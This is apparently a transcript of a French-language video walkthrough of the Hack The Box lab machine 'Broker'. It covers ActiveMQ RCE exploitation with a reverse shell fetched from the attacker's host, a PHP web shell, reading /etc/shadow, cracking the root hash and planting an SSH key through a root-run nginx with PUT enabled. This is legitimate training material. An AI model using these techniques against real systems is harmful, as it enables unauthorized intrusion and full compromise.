Bonjour et bienvenue à tous sur cette nouvelle vidéo CTF sur la plateforme Hack2Box. Donc on est sur la box Broker, qui est une box easy sous Linux, donc on reprend doucement, puisque ça faisait un petit moment que j'avais pas fait de vidéo CTF. Les deux dernières vidéos, c'était des vidéos plus sur des choses plus générales, on va dire. C'était pas focalisé sur de la sécurité offensive. J'ai démarré la machine virtuelle, je vais copier l'adresse IP ici. J'ai démarré ma machine attaquante aussi, qui est sur ParrotOS. Je vais aller dans mes documents, dans Hack2Box, machine, easy, et je vais créer un répertoire broker. Donc ça c'est une box que j'ai jamais fait, hein. Voilà, je vais me connecter au VPN, connect to HTTP machines. Voilà, je devrais être connecté au VPN d'Hack2Box maintenant, voilà. Je suis connecté au VPN d'Hack2Box. Donc d'abord je vais ping la machine pour voir si j'arrive à la joindre. Ok, donc j'arrive à joindre la machine. Donc comme d'habitude, on fait un scan and map pour voir quels ports et quels services sont accessibles sur la machine cible. Donc on fait nmap, l'adresse IP cible, ou le nom dot, ça peut marcher aussi. A majuscule pour le mode agressif, donc on scanne les ports ouverts, les versions des services, et on exécute les scripts par défaut nmap. -p- pour scanner tous les ports, parce que par défaut nmap scanne les 1000 ports les plus répandus, on va dire. -t5 pour scanner à la vitesse maximale. On nmap results.txt pour enregistrer tout ça dans un fichier txt. On peut aussi l'enregistrer au format XML pour Metasploit si jamais. Et -v pour activer le mode verbeux ou verbose en anglais. Je fais entrer. Alors on a le port 22, le port 80. Oula, on a pas mal de ports qui sont ouverts ici. Alors il y a pas mal de ports qui me disent rien du tout. Donc on a le port 22 pour le SSH, j'imagine, 80 pour le HTTP, le service HTTP. Et les autres ports, par contre, j'en ai aucune idée. Je les ai jamais vus, je crois. Ces ports-là, je sais pas à quoi ils correspondent. En attendant, on va essayer de naviguer sur le port 80 de la machine cible. Et on nous demande un username et un password. Si je fais admin. Bon, c'était aussi simple que ça, c'était admin, d'accord. Donc on a des identifiants admin. Et là on arrive sur ActiveMQ. Apache ActiveMQ, ça me dit strictement rien, qu'est-ce que c'est? Manage ActiveMQ Broker. On a une version ici, on a une info sur la version. On peut envoyer un message JMS, je ne sais pas ce que c'est, on verra après. Peut-être qu'il y a une injection de commande ou ce genre de choses ici. Bon, on va pas s'attarder plus là-dessus, on va directement chercher ActiveMQ avec la version qu'on a trouvée. Apache ActiveMQ. Et on colle la version qu'on a trouvée, 5.15.15. On va peut-être chercher sur le site du NIST, peut-être qu'on va trouver, peut-être on va chercher CVE. Ah, ici on a peut-être quelque chose, View Vulnerabilities. Ah, alors on a deux vulnérabilités, une high et une critical. Une fois qu'un utilisateur est authentifié sur Jolokia, je ne sais pas ce que c'est, on va chercher rapidement. JMX with JSON over HTTP. Bon, c'est un composant de ActiveMQ en gros. Donc on pourrait, une fois qu'on est authentifié là-dessus, on pourrait déclencher une exécution de code arbitraire. Dans les configurations de ActiveMQ, JT permet à org.jolokia http agent servlet, donc ça c'est une classe Java si je dis pas de bêtises, de gérer les requêtes qui sont envoyées à /API/Jolokia. Donc en fait on peut créer un web shell à partir de cette vulnérabilité là. Et ça là il y a quoi? Et cette vulnérabilité là on peut instancier n'importe quelle classe, donc on peut avoir une exécution de code arbitraire, puisque si on peut charger n'importe quelle classe Java, du coup on peut exécuter ce qu'on veut en principe. Users are recommended, et ils disent d'upgrade à la version 5.15.16. Ok, et nous on a la version juste en dessous, qui est censée être vulnérable à cette vulnérabilité là. Alors j'aurais tendance à du coup d'abord essayer d'exploiter la plus critique. Donc ce qu'on va faire, c'est que je vais copier ce numéro de CVE là, et on va aller sur exploitdb.com, et je vais aller dans Search EDB, et ici je vais coller le numéro de CVE, Search, on trouve rien. Bon, alors je vais chercher sur GitHub, ici on a peut-être un exploit, on a un exploit en Python, ok, et là, poc.yml, ok, et là on a notre shell, ok, donc il faudra modifier l'adresse IP et le port, logiquement, ok, bon, ce que je vais faire, c'est que je vais copier ce repository. Alors le scan and map c'est terminé, je vais peut-être jeter un coup d'œil au scan and map d'abord, peut-être qu'on a des infos en plus. Ok, bon, c'est que la machine tourne sous Ubuntu. MQTT, si je dis pas de bêtises, c'est un service qui est utilisé par les objets connectés, il me semble. On a JT, il n'y a pas de choses qui me sautent aux yeux ici. On va copier le repository GitHub, alors je vais juste créer un répertoire exploits, c'est bien de rester un minimum organisé. Git clone, je colle l'adresse, enfin l'URL du repository. Donc là j'ai téléchargé j'ai cloné le repository sur ma machine. Voilà, donc je vais dans le répertoire qui a été créé.
Et ici j'ai donc mon exploit.py. Alors juste jeter un œil au code d'abord. Là il y a un header, je sais pas à quoi il sert et à quoi correspond cette valeur exactement. Body header plus 01 plus class name. Alors il convertit en exa le nom de la classe. Ok, après il envoie juste le paquet et ok, d'accord, bon ben... Alors ici on a une explication sur comment fonctionne l'exploit. Ok, ils nous disent en fait, target IP c'est l'adresse IP du serveur ActiveMQ. Donc Python 3 exploit.py -i l'adresse IP cible, -p. Alors ils disent que par défaut c'est sur le port 61616. Je vais vérifier sur le scan nmap. Cat nmap scan 61616. Apache MQ. OpenWire Transport, c'est bien ça, 61616. Et ensuite, il faut mettre -u le fichier XML. Alors, le fichier XML, il faut d'abord que je le modifie. Il faut que je le modifie parce que le reverse shell n'est pas bon. Là, c'est pas un reverse shell qui va s'ouvrir sur ma machine à moi. Donc ici, je dois changer l'adresse IP en mettant la mienne. Et le port d'écoute qui sera 4444. J'enregistre, je quitte. Et maintenant, je vais mettre sur écoute. Poncat-cs-lp 4444. Ok, et ici, donc, je lance mon exploit, je lui dis que l'adresse IP cible c'est celle-là, le port cible c'est celui-là, et -u, et le fichier c'est... non, c'est POC. Ah mais non, URL to POC. URL to POC, en fait, il lui faut une URL, pas un... En fait, il lui faut une URL, donc j'ouvre un serveur web ici, et là, je vais rectifier ça, je vais pas mettre un chemin d'un fichier, je vais mettre l'URL du fichier malveillant qui est hébergé sur mon serveur web, http:// 10.10.14.66 /poc.xml. Normalement ici j'ai dû recevoir une requête, deux requêtes, bon en tout cas j'ai reçu une requête de l'adresse IP cible, et ici j'ai reçu mon reverse shell, si je fais CTRL D, et là donc j'ai un reverse shell en tant que ActiveMQ sur la machine broker. Alors on va voir ce qu'il y a dans le répertoire home maintenant. Il y a un répertoire ActiveMQ, visiblement il n'y a pas de... Il n'y a pas d'autre utilisateur, on va directement devoir passer route. Donc ici on a le flag user, je vais le copier. Je vais le mettre sur Hack-the-Box ici, submit. Bon, c'était relativement facile quand même. Et ensuite, on va essayer de passer route. Alors je vais juste fermer tout ça. On va essayer de passer admin. Déjà je vais voir si j'ai des droits sudo. J'ai des droits sudo. Je peux lancer en tant que n'importe qui sans mot de passe l'exécutable usr sbin nginx. Donc je peux le lancer en tant que root. Est-ce qu'avec ça j'ai moyen, on va voir sur GTFO-bins, si j'ai moyen d'ouvrir un shell. Pas d'après GTFO-bins, alors on va voir ce qui se passe si on fait sudo nginx-h peut-être, configuration file. Donc par défaut il va charger ce fichier de conf. Alors ce que je pense qu'on peut, à mon avis ce qu'on peut faire, là j'ai pas encore essayé, je sais pas si ce que je vais vous dire va fonctionner, mais l'idée que j'ai là pour l'instant, ce serait de créer un fichier de configuration Nginx dans mon répertoire ici, puisque j'ai les droits d'écriture dans le répertoire Home ActiveMQ, et de faire en sorte que Nginx se lance sur, je sais pas, le port n'importe 1, 2, 3, 4 par exemple, et après je pourrais créer un fichier PHP qui contient donc un web shell, et comme j'aurais exécuté Nginx en tant que root, je pourrais exécuter ce web shell en tant que root. Je pense pouvoir faire ça, on va essayer. Donc déjà je vais jeter un œil au fichier de configuration Nginx ici, parce que je n'ai pas eu trop l'occasion d'utiliser ça. Alors ici on doit définir l'utilisateur en tant que qui est exécuté le serveur web je pense. Donc là il faudra modifier mettre root, je pense. Peut-être modifier le PID, pour pas que ça rentre en conflit avec celui qui est déjà en cours d'exécution. Où est-ce qu'on peut définir le port d'écoute? Alors du coup je vais créer un répertoire privesc, donc mkdir privesc. Alors sudo nginx-h, -h. Et donc là on pouvait définir un fichier de conf. Donc je vais tout simplement copier le fichier de configuration existant dans mon répertoire privesc. Ok. Maintenant je vais modifier ce fichier de conf et je vais lui dire, pour le protocole HTTP, je vais lui dire, alors déjà non, au début je vais ici dire que ça tourne en tant que root. Le PID je vais juste mettre un autre truc, je vais mettre nginx2.pid par exemple, voilà. Histoire que ça rentre pas en conflit avec le nginx qui est déjà en cours d'exécution. Je sais pas si je suis obligé de faire ça, mais dans le doute je le fais. Alors ici je vais inclure un fichier de configuration qui est dans /home /apache, c'était quoi Apache MQ? Donc Apache MQ /privesc /default, j'enregistre. Ensuite je vais copier le fichier default, alors ça c'est dans sites enabled, mince. Voilà, donc là j'ai copié le fichier default que je vais éditer, qui est le fichier de configuration qui correspond à admin
donc à l'autre virtuel admin.broker.htb sur le port 80. Donc là, ce que je vais faire, c'est que je vais pas mettre en écoute sur le port 80, je vais mettre en écoute sur le port allez, 90. Voilà, server name, on s'en fout. Et proxy pass, ça c'est vers quel port on veut que ça redirige. Je vais juste l'enlever en fait. Et là je vais pas mettre ça, je vais mettre server name, je vais mettre privesc. Privesc.local, voilà. C'est juste pour l'exemple. Donc je mets ça. Maintenant si je fais nginx, alors attendez, sudo nginx-c et que j'utilise ce fichier de configuration là, no such file or directory. Ah mince, ah par défaut il va chercher, il lui faut un chemin absolu, ok. On va mettre /home /apache mq /privesc /no such file or directory. Comment ça? Bon, je comprends pas, j'ai dû faire une faute mais j'ai pas vu. Ah, et là il me dit quoi? Il trouve pas le fichier in à la ligne 60. C'est active MQ, pas Apache MQ, je suis bête. Normal que ça marche pas. /default. J'enregistre, je quitte. Là normalement je devrais plus avoir la même erreur. Ok. Si je fais netstat-tulpn, normalement je devrais avoir le port 90 qui est sur écoute. Ok. Sauf que j'ai oublié un détail. J'ai oublié ici dans le fichier de configuration du site de définir la racine dans laquelle sont les fichiers du site web qui est sur le port 80. Donc là il faut que je mette root et là je vais mettre /home /activemq /privesc. Alors comme le port est déjà sur écoute, ça va peut-être poser problème. Dans le doute je vais mettre sur un autre port, 91. Je vais relancer la commande, je vais relancer nginx. Ah, il y a une erreur ligne 5. Ah mince, j'ai oublié le point virgule. Je réessaye. Donc là maintenant j'ai sur le port 91 mon serveur nginx qui tourne en tant que root normalement. Et si la racine du site se situe ici dans le répertoire où je suis, où j'ai les droits d'écriture. Donc ici, je peux créer un fichier index.php dans lequel je vais mettre un web shell php system et ici je vais passer $-get cmd. Voilà, je vais passer le paramètre cmd dans la fonction system pour exécuter une commande system depuis le fichier, enfin depuis le site web. Et après donc point virgule. Et après je ferme la balise PHP, normalement ça devrait être bon. Donc là, maintenant, si je prends mon navigateur, que je navigue vers l'adresse IP cible sur le port 91, forbidden, pourquoi? Si je fais /index.php, ah mince, il me le télécharge. Je crois qu'il faut que je remodifie le fichier de conf. Donc là je vais essayer quelque chose finalement de plus simple. Ici bon, j'ai changé le port, j'ai mis 93. Je vais essayer d'accéder, en fait j'ai défini la racine du site web dans /root. Et on va voir si je peux aller dans /root. Donc je vais exécuter le nginx avec ce fichier de conf, voilà, forbidden. Et si je mets root.txt, j'ai le flag root. Ok, bah c'était plus simple que ce que je pensais. Et si je vais dans .ssh, forbidden. Et est-ce que j'ai IDRSA? Non. Bon, bah en tout cas j'ai le flag root. Bon, on a le flag root, mais je vais quand même essayer autre chose. Déjà, est-ce qu'on a accès peut-être à l'historique de l'utilisateur root? Ça m'étonnerait, mais on n'y a pas accès. Je vais essayer quelque chose. Je vais modifier le fichier de conf, là, 94, et je vais mettre la racine dans /etc. Je vais faire ça, enregistrer, quitter. Je vais lancer nginx, ok. Et là, si je vais sur 94 et que j'essaie d'accéder au fichier shadow, ah, il essaie de me le télécharger, ça c'est cool. Et si je l'ouvre, j'ai le hash de l'utilisateur root, ok, copier. Et si j'essaie de le craquer, est-ce qu'on y arrive? Putain, ce serait parfait ça. Nano, alors je vais peut-être juste changer, je vais changer de répertoire, je vais créer un répertoire loot. C'est pour qu'un seul fichier, c'est peut-être pas utile, mais j'essaie de prendre ce réflexe là. Nano hash.txt, je colle le hash de l'utilisateur root, et après je fais john hash.txt --wordlist égale /usr share wordlist rockU.txt. On va essayer de craquer le mot de passe de l'utilisateur root. No hash loaded. Pourquoi? Ah, il reconnaît pas parce que c'est du YesScript. Alors l'option avec John, c'est --format égale crypt. Ok. Donc là, John essaie de craquer le hash du mot de passe de l'utilisateur root.
Bon, visiblement, on n'arrive pas à craquer le hash de l'utilisateur root. Donc, ce que j'ai fait là, c'est que j'ai modifié. Alors, ça, on peut fermer. J'ai modifié le fichier default 4. Default. J'ai rajouté l'option dav methods put pour activer la méthode put pour enregistrer des fichiers dans le répertoire root, du coup, puisque la racine du site est là. Donc je vais voir s'il y a moyen d'écrire une clé publique SSH pour après me connecter en SSH et avoir un shell en tant que root. Ce serait quand même plus intéressant que juste choper le flag. Ben, on va essayer. Visiblement j'ai pas eu d'erreur, donc c'est qu'il a reconnu cette option. Donc visiblement, donc normalement la méthode put est activée. Donc par exemple je vais faire ssh-keygen-f idrsa. Je mets pas de passphrase, on s'en fout. Et donc là j'ai une clé privée, une clé publique. Donc ce que je vais faire, déjà je vais renommer la clé idrsa.pub, je vais la renommer autorized-keys, ok. Et maintenant je vais essayer d'upload ce fichier. Donc je vais faire curl-x http-x put. Donc l'URL c'est http:// et l'adresse IP cible alors le port j'ai mis quoi, 96 .ssh là je mets rien, et après je mets upload-file autorized keys. J'ai pas eu d'erreur visiblement, ok. Et si je vais sur l'adresse IP cible 2.96 .ssh autorized keys, ça va essayer de me le télécharger. Donc j'ai bien réussi à upload un fichier, donc ma clé privée publique SSH, pardon. Et maintenant si je fais ssh root l'adresse IP cible -i et j'utilise ma clé privée qui correspond à la clé publique que j'ai upload, yes, j'ai un shell en tant que root sur la machine. Bah parfait, c'est cool ça. Bon ben on a terminé cette box, c'était plutôt cool, l'élévation de privilèges, c'était plutôt original, j'aimais bien. Donc qu'est-ce qu'on a fait? Comme d'habitude, énumération active avec Nmap, ça change jamais quasiment. Donc on a énuméré les ports et les services accessibles sur la machine cible. Donc on a vu qu'il y avait sur le port 80 Apache ActiveMQ qui est un broker, d'où le nom de la box, broker. Qui en français correspond à, dans ce cas-là précis, ça correspond à agent de message, je crois, oui c'est ça, agent de message. Et en gros, ça permet de gérer l'échange de messages entre des émetteurs et des récepteurs. Alors ça peut permettre de valider, transformer et rediriger des messages entre des émetteurs et des récepteurs, en gros. Ça peut servir pour plein d'utilisations, je pense. Il me semble que ça peut servir par exemple avec... ça peut être utilisé avec des IoT, si je dis pas de bêtises, ça vérifie, hein. Je m'y connais pas trop là-dedans, mais il me semble que c'est le cas. Donc voilà, on a trouvé ça, on a vu qu'il y avait une RCE là-dessus, donc on a pu exploiter une RCE. En fait, en gros, on pouvait charger un fichier YML arbitraire qui contenait un reverse shell qu'on hébergeait sur notre machine. La machine cible téléchargeait ce fichier YML depuis notre machine, puis ça nous permettait d'exécuter un reverse shell. Une fois qu'on avait ce reverse shell et qu'on était dans la machine, en tant que ActiveMQ, on a vu qu'on pouvait exécuter Nginx, l'exécutable Nginx, en tant que root, sans mot de passe. Donc qu'est-ce qu'on a pu faire? On a pu créer un fichier de configuration Nginx nous-mêmes, un fichier de configuration personnalisé, qui nous a permis d'héberger un serveur web sur le port 96, enfin n'importe le, moi j'ai pris 96, vous pouvez prendre n'importe quel port disponible en soi. On a pu faire en sorte que ce serveur web s'exécute en tant que root, au lieu de www.data par défaut. Et on a aussi pu faire en sorte d'autoriser l'upload de fichiers sur ce serveur web et de définir la racine du serveur web dans /root. Ce qui au final, tout ça regroupé dans un fichier de configuration, nous a permis tout simplement d'upload des fichiers arbitraires dans le répertoire root. Ce qui nous a permis d'upload une clé publique SSH dans le répertoire de root pour ensuite nous connecter avec notre clé privée SSH et avoir un shell en tant que root. Et donc on a obtenu l'accès total à la machine. J'ai trouvé l'élévation de privilèges plutôt originale pour une machine easy, franchement ça fait plaisir. D'habitude c'est des privesques qui sont en général c'est des CVE, on compile un truc, on l'exécute, c'est pas très fun. Là j'ai bien aimé. C'était plus original je trouve, voilà. Donc j'espère que la vidéo vous aura plu. Comme d'habitude vous aurez le compte rendu en description, il faut que je le fasse, mais vous aurez le compte rendu normalement. Vous aurez aussi le sommaire si vous voulez passer à une étape ou autre de la vidéo sans tout regarder, si vous êtes intéressé par une étape précise. Donc vous avez le sommaire en description. Vous avez aussi le lien du serveur Discord. D'ailleurs petit moment pub pour le serveur Discord. Vous cherchez un serveur Discord d'entraide et de partage dans le thème de la cybersécurité? Le serveur CTF Hacking France est fait pour vous. Que vous soyez débutant ou non, vous êtes bienvenus, que ce soit pour être aidé ou pour aider. Nous organisons aussi des talks avec des invités qui nous partagent leur expertise. Le lien est dans la description. Donc voilà, n'hésitez pas à vous abonner si vous voulez suivre les prochaines vidéos qui sortiront.
à liker si vous avez aimé la vidéo. Vous avez l'espace commentaire si vous avez des questions, des suggestions, des conseils même, hein. La section commentaires est là, n'hésitez pas. Et moi je vous dis à la prochaine.